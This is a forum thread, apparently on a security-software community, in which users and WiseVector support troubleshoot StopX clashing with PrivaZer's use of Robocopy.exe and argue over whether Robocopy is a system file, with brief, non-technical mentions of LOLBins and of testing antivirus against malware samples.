WiseVector Stop-X

Don't worry, its our update server.

 

Oh, great!

Will that fix be included in the next release?

Thank you.

 

Robocopy.exe is a NON-system process included with Windows. I hope that WV will not henceforth be set to ignore Robocopy.exe because it has been a favorite target of malware programmers in the past. Namely, they write virus files with malicious scripts and save them as Robocopy.exe.

From this standpoint, the paid version of WV might consider inclusion of a whitelist, including a SHA-256 fingerprint of each safe process on a user's computer.

 

I actually prefer Xcopy.

 

@WiseVector

More curiosity, than worry.

 

Pretty good alternative.

 

The behavior analysis module has been updated automatically and this issue has been resolved already yesterday. If you enabled the auto-update of WVSX, you will find out.

 

Oh! I didn't realise modules were updated separately too.

Very nice!

 

Thanks for your advice.
"Robocopy.exe" is a system file included in Windows 10. You might confuse it with some third party APP.
Our behavior analysis module got a problem when analyze hundreds of thousands of "Robocopy.exe" launching at a very short time. We have adjusted the module, but not whitelist the process itself.

 

PrivaZer fix confirmed!

 

It is NOT a system file because it can be easily deleted with NO adverse effect on Windows OS. Of course, deletion of Robocopy.exe will adversely affect those programs (such as PrivaZer) that use it. I know of 3 large networks where Robocopy.exe has been intentionally removed from all of their serviced computers.

As to your remark that it is included in Windows 10 -- I'm sure you know that it is also included in Vista, Win 7, Win8, & Win8.1.

I do not get confused quite that easily. Any "third party APP" named Robocopy.exe is almost certainly malware. A SHA-256 fingerprint will distinguish the legitimate Microsoft Robocopy.exe from any counterfeit bearing that same file name.

 

He must of only invited one friend this time, again after running PrivaZer.

 

Thanks for your explaination.
We might have different understandings of Robocopy.exe. Since it is made by MS and located in system directory so we think it is a system file.

 

1. You have WVSX updated to the latest V2.67, right?
2. The way we tested PrivaZer was: click Scan-in-depth->Computer->Scan->Clean. Everything went smoothly. What's your steps?
3. Can you please send the file named "v2-*-*-*-*.dmp" (* presents any number) in the WiseVector StopX installation folder to support@wisevector.com?
This is the crash dump file of WVSX, thanks.

 

Hi WiseVector,

Email with two logs sent.

Yes.

I click Scan-in-depth > Scan > I have "Start cleaning" unchecked > Clean.

Thanks.

 

If I stand in a garage, that does not make me an automobile. Removal of a true system file will sooner or later (usually sooner) cause an operating system problem. Windows gets along just fine without Robocopy.exe.

 

One really can't just get rid of these System32 command line processes like Robocopy, certutil, attrib, etc just because they can be used for nefarious purposes (can you say LOLBin?); they are too well ingrained in the Windows OS to be trashed.

It should be said that although LOLBin's are hot topic currently, their use has actually been occurring for a very long time (not meaning to dredge up the residua of a misspent youth, but I should note that in years past my Barbie used Xcopy to drop a Bot on Ken's computer).

 

Any file which resides in the System32 folder and is put there when Windows is installed, is classified as a system file, whether the file is actually critical to the operation of Windows or not.

 

Please try this: click Settings of WVSX->Basic->Real-Time Protection->Set Up->Uncheck "Scan on file creation" and observe whether this issue will happen again or not.
Thanks for your help!

 

Yes but to clarify, how did you test this? I assume you disabled realtime protection and enabled only memory protection? Because in order to block code injection and process hollowing, you will need to let the malware run. That's why I asked Cruelsister how she tested NetWalker and Agent Tesla.

 

You need to disable real-time protection to run the malware if it is already detected by static scanning.

 

Did that. Unfortunately, while running PrivaZer on that machine a second SysTray icon appeared again. For whatever reason, this machine does not show the same behaviour.

Did the logs show anything interesting?

Thanks.

 

Hi,
We still need time to analyze this log and we would like to constrict the scope of analysis, that's why I asked you to uncheck "Scan on file creation" first.

Can you please tell me what's the difference between the two computers? One of them has been installed more than two AV and the other only has WVSX?

 

Both run the same security + mostly the same other software.

 

I think I disabled the wrong setting last time so I ran PrivaZer again with "Scan on file creation" unchecked. This time no other icons showed up.

Thanks.